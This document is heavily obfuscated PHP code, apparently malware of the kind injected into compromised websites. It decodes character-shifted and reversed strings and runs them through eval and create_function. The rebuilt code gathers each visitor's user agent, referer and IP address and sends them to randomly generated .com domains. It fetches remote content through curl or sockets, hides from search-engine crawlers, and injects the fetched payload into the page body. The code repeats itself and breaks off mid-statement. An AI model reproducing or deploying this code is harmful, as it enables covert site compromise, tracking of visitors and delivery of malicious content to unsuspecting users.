implode(array_map("mxwrnfp",str_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!\x246767~6<Cw6<pd%w6Z6<.5`hA\x27pd%6<pd%w6Z6<.4`hA\x27pd%6<pd%w6Z6<.3`hA\x27pd%6<pd%w6Z6<.2`hA\x27pd%6<C\x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf\x27*&7-n%)utjm6<\x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX\x27u%)7fmjix6<C\x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#\x27rfs%6~6<\x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA\x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA\x27K6<\x7fw6*3qj%7>\x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA\x273qj%6<*Y%)fnbozcYufhA\x272qj%6<^#zsfvr#\x5cq%7/7#@#7/7^#iubq#\x5cq%\x27jsv%6<C>^#zsfvr#\x5cq%7**^#zsfvr#\x5cq%)ufttj\x22)gj6<^#Y#\x5cq%\x27Y%6<.msv`ftsbqA7>q%6<\x7fw6*\x7f_*#fubfsdXk5`{66~6<&w6<\x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA\x27&6<.fmjgA\x27doj%6<\x7fw6*\x7f_*#fmjgk4`{6~6<tfs%w6<\x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR\x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR\x27id%6<\x7fw6*\x7f_*#ujojRk3`{666~6<&w6<\x7fw6*CW&)7gj6<.[A\x27&6<\x7fw6*\x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!}\x27;!>>>!}_;gvc%}&;ftmbg}\x7f;!osvufs}w;*\x7f!>>\x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!\x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!\x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!\x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!\x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg\x22)!gj}1~!<2p%\x7f!~!<##!>!2p%Z<^2\x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO\x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f\x27,*e\x27,*d\x27,*c\x27,*b\x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%\x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj\x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc\x7f!|!*uyfu\x27k:!ftmf!}Z;^nbsbq%\x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}\x27;%!<*#}_;#)323ldfid>}&;!osvufs}\x7f;!opjudovg}k~~9{d%:osvufs:~928>>\x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4\x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>\x22!ftmbg)!gj<*#k#)usbut`cpV\x7f\x7f\x7f\x7f<u%V\x27{ftmfV\x7f<*X&Z&S{ftmfV\x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x\x22l:!}V;3q%}U;y]}R;2]},;osvufs}\x27;mnui}&;zepc}A;~!}\x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U!\x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_\x5c}X\x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!\x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:*r%:-t%)3of:opjudovg<~\x24<!%o:!>!\x242178}527}88:}334}472\x24<!%ff2!>!bssbz)\x24]25\x24-\x24-!%\x24-\x24*!|!\x24-\x24\x5c%j^\x24-\x24tvctus)%\x24-\x24b!>!%yy)#}#-#\x24-\x24-tusqpt)%z-#:#*\x24-\x24!>!\x24/%tjw/\x24)%\x24-\x24y4\x24-\x24]y8\x24-\x24]26\x24-\x24<%j,,*!|\x24-\x24gvodujpo!\x24-\x24y7\x24-\x24*<!\x24-\x24gps)%j>1<%j=tj{fpg)%\x24-\x24*<!~!\x24/%t2w/\x24)##-!#~<#/%\x24-\x24!>!fyqmpef)#\x24*<!%t::!>!\x24Ypp3)%cB%iN}#-!\x24/%tmw/\x24)%c*W%eN+#Qi\x5c1^W%c!>!%i\x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!\x24/%tmw/\x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr\x5c1^-%r\x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss\x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s:\x5c%j:.2^,%b:<!%c:>%s:\x5c%j:^<!%w`\x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~\x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#\x24#-!#]y38#-!%w:**<")));								$fenmamv = 				$siv = "str_replace"; 				$v9 = '$v9 = #5656}5;Bv5;oc$v5Y5;-4_g@&oc$5;oc$v5Y5;-3_g@&oc$5;oc$v5Y5;-2_g@&oc$5;oc$v5Y5;-1_g@&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW@5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW@5{6))086,1pi$6,J(tcennocW@!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW@&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi@(pi2gnol@&2pi$5;)X$(emanybXteg@&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap@6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi@&%5;-elif@&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z@&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle })8-,i$,ataDzg$(rtsbus(etalfnizg@ nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ )2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi )1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe@=1a$ ;)po$,)-$(dtg@(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } )po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45@9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *@ = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W@Y@RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|@:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W#; $slv = "\x73\164\x72\162\x65\166"; $s1v="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; $svv = #//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46\27x\36\56x\26\77x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x\441\d6x\"=m$;"261\47x\361\26x\561\37x\"=r$;"351\36x\141\07x\"=p$;"651\56x\451\27x\461\37x\"=l$9{9)q$9,s$(2ne9noitcnuf;}#; $n9 = #1067|416|779|223|361#; $ee1 = array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = #.$siv.#($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#); #,#for($i=0;$i<sizeof($#,#); } #.$s1v.#("", "};".$#,# = explode("#); $s99 = #Xoo2($bA$hM|", #.$slv.#($b)V$dM*"Ph[0]V$b = $h[1]; Bd)Z $bHiPdSPbNb."//"V} Xcqq($qwA$domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb"); return random($domarr,$qwV} Xoo1($yA$y= #.$slv.#($yV$g=DyG+1V$vM:",Dy,0G)VBv)Z $qM|"PvSV$gHq[0],$q[1],$gNg."//"V} $s1v(""Psiv("\71"," ",$slv($svv))VXrandom($arr,$qwA$g="\x20\167\x2d\70\J6794587495086f963874,qq-82d94486e,r-86297186e94186d945,wq-874941874,s-87\J3\54\C7\75\x20\167\x2e\40K2\73\x20L5\x2d\70"."6d944835,sq-873964872937873960\J8\66\C3\71\J5\61\J8\67\J4\42\Jb";$soy = "\C5L6\J2";$xx="\C5\170K0"."L4\CfO4\C5";$ecx="\C3\162\C5O1K4O5\x5fO6K5L6\C3\164\C9L7\Ce";$scy="K3\164K2\137K2O5K0L4\C1O3\C5";$F\x5c\170Kc\134\J1\174\Jd\42Kc\42\Jb\44Kc\44");$aF8|9|-|,| ");$mec=$ecx;Ba)Z$g = $scy($aaS,$aS,$gV}$ecx("", "};$g//");$mec(""Psoy("\230\77L3O7\26\167\114\130\223\257\211\2\253\5\172\316\25\262O5\25\62\72\127L6\270\100L4\56\341\77\4\37\21L2\206\334\101\334\32\210\353\173\253\5\123\231\47\13\20",$scy)Vreturn $arr[rand((0.24-(0.03*),(0.1875*6))].$qw;}  $r9M|",$n9V$b9=0;$a9=0; for($i9=0;$i9<sizeof($r9);$i9++Aif ($i9==0) $a9=0; else $a9=$r9[$i9-1]+$a9; $b9=$r9[$i9]; $v_[]=Dv9Pa9Pb9V} $y =1; for($i=0;$i<5Z$vv1 ="o"."o".$y;if ($y==1) $y=2; else $y=1; $vv1($v_SV}#; eval($siv(array("O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M"), $ee1, $s99));'; 								eval($siv("#", "\x27", $v9));								$v9 = #5656}5;Bv5;oc$v5Y5;-4_g@&oc$5;oc$v5Y5;-3_g@&oc$5;oc$v5Y5;-2_g@&oc$5;oc$v5Y5;-1_g@&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW@5}5;					t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW@5{6))086,1pi$6,J(tcennocW@!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW@&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi@(pi2gnol@&2pi$5;)X$(emanybXteg@&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap@6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi@&%5;-elif@&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z@&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle })8-,i$,ataDzg$(rtsbus(etalfnizg@ nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ )2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi )1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe@=1a$ ;)po$,)-$(dtg@(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } )po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45@9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *@ = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W@Y@RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|@:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W#; $slv = "\x73\164\x72\162\x65\166"; $s1v="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; $svv = #//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46\27x\36\56x\26\77x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x\441\d6x\"=m$;"261\47x\361\26x\561\37x\"=r$;"351\36x\141\07x\"=p$;"651\56x\451\27x\461\37x\"=l$9{9)q$9,s$(2ne9noitcnuf;}#; $n9 = #1067|416|779|223|361#; 					$ee1 = array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = #.$siv.#($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#); #,#for($i=0;$i<sizeof($#,#); } #.$s1v.#("", "};".$#,# = explode("#); 					$s99 = #Xoo2($bA$hM|", #.$slv.#($b)V$dM*"Ph[0]V$b = $h[1]; Bd)Z $bHiPdSPbNb."//"V} Xcqq($qwA$domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb"); return random($domarr,$qwV} Xoo1($yA$y= #.$slv.#($yV$g=DyG+1V$vM:",Dy,0G)VBv)Z $qM|"PvSV$gHq[0],$q[1],$gNg."//"V} $s1v(""Psiv("\71"," ",$slv($svv))VXrandom($arr,$qwA$g="\x20\167\x2d\70\J6794587495086f963874,qq-82d94486e,r-86297186e94186d945,wq-874941874,s-87\J3\54\C7\75\x20\167\x2e\40K2\73\x20L5\x2d\70"."6d944835,sq-873964872937873960\J8\66\C3\71\J5\61\J8\67\J4\42\Jb";$soy = "\C5L6\J2";$xx="\C5\170K0"."L4\CfO4\C5";$ecx="\C3\162\C5O1K4O5\x5fO6K5L6\C3\164\C9L7\Ce";$scy="K3\164K2\137K2O5K0L4\C1O3\C5";$F\x5c\170Kc\134\J1\174\Jd\42Kc\42\Jb\44Kc\44");$aF8|9|-|,| ");$mec=$ecx;Ba)Z$g = $scy($aaS,$aS,$gV}$ecx("", "};$g//");					$mec(""Psoy("\230\77L3O7\26\167\114\130\223\257\211\2\253\5\172\316\25\262O5\25\62\72\127L6\270\100L4\56\341\77\4\37\21L2\206\334\101\334\32\210\353\173\253\5\123\231\47\13\20",$scy)V					return $arr[rand((0.24-(0.03*),(0.1875*6))].$qw;				}  $v9 = '5656}5;Bv5;oc$v5Y5;-4_g@&oc$5;oc$v5Y5;-3_g@&oc$5;oc$v5Y5;-2_g@&oc$5;oc$v5Y5;-1_g@&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW@5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW@5{6))086,1pi$6,J(tcennocW@!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW@&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi@(pi2gnol@&2pi$5;)X$(emanybXteg@&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap@6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi@&%5;-elif@&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z@&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle })8-,i$,ataDzg$(rtsbus(etalfnizg@ nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ )2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi )1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe@=1a$ ;)po$,)-$(dtg@(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } )po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45@9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *@ = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W@Y@RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|@:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W'; $slv = "strrev"; $s1v="create_function"; $svv = '//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46\27x\36\56x\26\77x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x\441\d6x\"=m$;"261\47x\361\26x\561\37x\"=r$;"351\36x\141\07x\"=p$;"651\56x\451\27x\461\37x\"=l$9{9)q$9,s$(2ne9noitcnuf;}'; $n9 = '1067|416|779|223|361'; $ee1 = array('\14',', $',') { ','[$i]','substr($','a = $xx("|","',',strpos($y,"9")',' = '.$siv.'($','x3','\x7','\15',';$i++) {','function ','x6','); ','for($i=0;$i<sizeof($','); } '.$s1v.'("", "};".$',' = explode("'); 	$s99 = 'Xoo2($bA$hM|", '.$slv.'($b)V$dM*"Ph[0]V$b = $h[1]; Bd)Z $bHiPdSPbNb."//"V} Xcqq($qwA$domarr = 